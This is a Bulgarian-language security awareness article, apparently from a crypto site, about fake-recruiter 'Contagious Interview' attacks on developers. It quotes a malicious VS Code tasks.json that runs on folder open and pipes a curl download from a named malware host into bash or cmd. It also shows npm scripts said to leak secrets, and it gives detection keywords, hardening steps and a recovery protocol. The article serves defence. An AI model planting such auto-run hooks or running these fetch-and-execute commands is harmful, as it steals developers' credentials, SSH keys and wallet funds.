Заразно Интервю: Как фалшиви рекрутъри хакват разработчици
Резюме: Нова вълна от спонсорирани от държавата атаки удря най-добрите крипто разработчици. Измамниците се представят за рекрутъри или CTO и принуждават кандидатите да отворят зловреден код. Тази статия разглежда случая „Martin Erazo“, експлойта VS Code „tasks.json“ и „Протокола за Изгаряне“, необходим за оцеляване.
Отказ от отговорност: Тази статия цитира инциденти с киберсигурността, при които се използват фалшиви самоличности на реални хора. Имената "Martin Erazo" и "Ara Vartanian" се отнасят за персоните, използвани от атакуващите. Вярваме, че реалните хора зад тези имена са невинни жертви на кражба на самоличност.
1. Перфектната Жертва: Персоната "Martin Erazo"
Започва със съобщение, което натиска всички правилни бутони за един Senior Dev:
- Роля: CTO / Lead Architect
- Бюджет: $6M осигурено финансиране
- Tech: Web3, AI, Децентрализирана Инфраструктура
В наскоро потвърдена атака, рекрутър на име „Martin Erazo“ се свързва чрез LinkedIn. Профилът използва името и снимката на истински театрален режисьор, но трудовата история е фалшива и внезапно се променя на „IT Project Management“ през 2025 г. - класически знак за компрометиран или купен акаунт.
Измамата се развива бързо. Пропускат типичния HR скрининг и отиват направо на „Техническо Интервю“ със старши ръководител - в този случай имитация на истинския индустриален CTO Ara Vartanian (понастоящем в Limit Break).
Червен Флаг: Имената на проектите се променят постоянно. Рекрутърът продава „Betfin“ (GameFi платформа), но изпратената презентация е за „SpaceXView“ (Metaverse проект). Това несъответствие е улика, че измамниците рециклират активи между кампаниите.
2. Капанът: „Можете ли да прегледате нашия MVP код?“
Фалшивият „CTO“ твърди, че имат нужда от вашите експертни очи, за да проверите MVP (Minimum Viable Product) кода. Изпращат линк към GitHub Repo или ZIP файл и ви притискат да го отворите по време на интервюто или веднага след него.
Тук се случва хакът.
Те използват желанието ви да помогнете и егото ви. Мислите, че търсите бъг в React компонент. В действителност "бъгът" е "функция", предназначена да открадне спестяванията ви.
3. Техническото Проникване: Zero-Click Malware
Атакуващите използват „zero-click“ или „low-click“ експлойти, насочени към инструментите за разработчици. Не е нужно да стартирате приложението; простото отваряне на папката е достатъчно.
Оръжието: .vscode/tasks.json
В този конкретен случай, репото съдържаше заразен .vscode/tasks.json файл. Този файл казва на VS Code как да изгради проекта.
Зловреден Код:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Това е спусъкът. Веднага щом отворите папката във VS Code, тази задача се стартира автоматично.
- Payload: Използва curl за изтегляне на скрипт от
vscodesettingtask.vercel.app- известен хост на зловреден софтуер, маскиран като API за настройки. - Резултат: Скриптът работи в паметта и незабавно краде пароли за Chrome, сесийни бисквитки и SSH ключове.
План Б: package.json scripts
Ако хакът на VS Code се провали, те имат npm скриптове:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Изпълнението на npm install или npm start задейства server/server.js - локален C2 (Command and Control) скрипт, който изтича променливи на средата (AWS ключове, сийдове на портфейла) към нападателя.
4. Червени Флагове срещу Зелени Флагове
Как да забележите това, преди да е станало твърде късно?
Ако сте разработчик, „Частни Репа“ (Private Repos) или ZIP файлове трябва да задействат аларми от високо ниво. Легитимните компании използват Публични Репа или стандартизирани платформи за тестване.
Предупреждение: Това не е единственият път за атака срещу разработчици. Прочетете за Капана на Сътрудника в Discord и как Атаките на Веригата за Доставки правят зависимостите опасни.
| 🚩 Червен Флаг (Бягай) | ✅ Зелен Флаг (Безопасно) |
|---|---|
| Код Първо: Изпращат код преди оферта за работа | Стандартен Процес: Първо интервю, после код |
| Счупена Самоличност: Рекрутърът има несвързано минало (напр. Артист -> IT Мениджър) | Проверена История: Кариерата в LinkedIn е последователна |
| Несъответствие: Имената на проектите не съвпадат (Betfin vs SpaceXView) | Последователност: Име, документация и сайт съвпадат |
| Спешност: „CTO чака“, „отворете сега“ | Търпение: Уважават вашето време и график |
| Личен Имейл: [email protected] | Корпоративен Имейл: [email protected] (с работещи MX записи) |
5. Протокол за Сигурност: Как да интервюирате безопасно
Ако сте Senior Dev, ще ви ловуват. Закаляването на вашата среда е задължително.
Протокол 1: "Burner" Среда
Никога не използвайте основната си работна станция за тестове на код.
- Виртуални Машини: Използвайте VirtualBox или VMWare.
- Cloud Dev Среди: Използвайте GitHub Codespaces или Gitpod. Те са ефимерни и изолирани от вашите локални файлове на портфейла.
Протокол 2: Форензичен Одит
Преди да отворите непознат код:
- Проверете .vscode/tasks.json: Търсете
runOn: folderOpen. - Проверете package.json: Търсете съмнителни preinstall или postinstall скриптове.
- Ключови думи: grep за
curl,wget,os.homedir(),.ssh,wallet.
Протокол 3: Закаляване на VS Code
Деактивирайте „Workspace Trust“ глобално.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Това принуждава VS Code да иска разрешение преди да стартира задачи на ниво папка.
6. Решението: „Протокол за Изгаряне“ (Burn Protocol)
Ако сте отворили злонамерено Репо (като изпратеното от персоната „Martin Erazo“), приемете, че сте компрометирани. Нулирането не е достатъчно.
- Прекъсване на връзката: Издърпайте мрежовия кабел незабавно.
- Изгорете Портфейлите: Вашите Частни Ключове са изтекли. Създайте нови портфейли на чисто устройство (телефон) и преместете оставащите средства. Никога не използвайте повторно стария сийд.
- Убийте Сесиите: Излезте от всички сесии в Google, GitHub, AWS. Активно отменете токените.
- Проверка на SSH Ключ: Проверете настройките на GitHub/GitLab. Атакуващите често добавят свои SSH ключове, за да поддържат достъп през задната врата. Изтрийте всичко, което не разпознавате.
- Nuke It: Изтрийте диска и преинсталирайте операционната система. Това е единственият начин да сте 100% сигурни, че Rootkit-овете са изчезнали.
Заключение
Измамата „Заразно Интервю“ използва вашата собствена експертиза срещу вас. Тя се прицелва във вашето желание да решавате проблеми. Но в Web3, параноята е професионална добродетел. Проверявайте всяка самоличност, изолирайте всяко репо и никога не се доверявайте на „рекрутър“, който бърза да ви накара да стартирате код.
Готови ли сте да използвате знанията си?
Започнете да търгувате с увереност, задвижвана от AI, днес
ЗапочнетеСвързани статии
Отрова във Веригата за Доставки (Supply Chain Poison): Когато надеждните актуализации станат зловредни
Не сте изтеглили нищо странно. Просто актуализирахте Ledger приложението... И тогава парите изчезнаха. Ужасът на атаката срещу веригата за доставки.
Хартиеният Щит (The Paper Shield): Как правилно да архивирате Seed Phrase
Скрийншотите са катастрофални. Облакът е компютър на някой друг. Единственият сигурен начин за съхранение на частни ключове е 'Стомана' и 'Хартия'.
Дългата Измама (The Long Con): Психологията зад 'Pig Butchering'
Тя не изпрати съобщение на грешен номер. И не е влюбена във вас. Дълбоко потапяне в 'Sha Zhu Pan', най-жестоката крипто измама, и как да разпознаете сценария.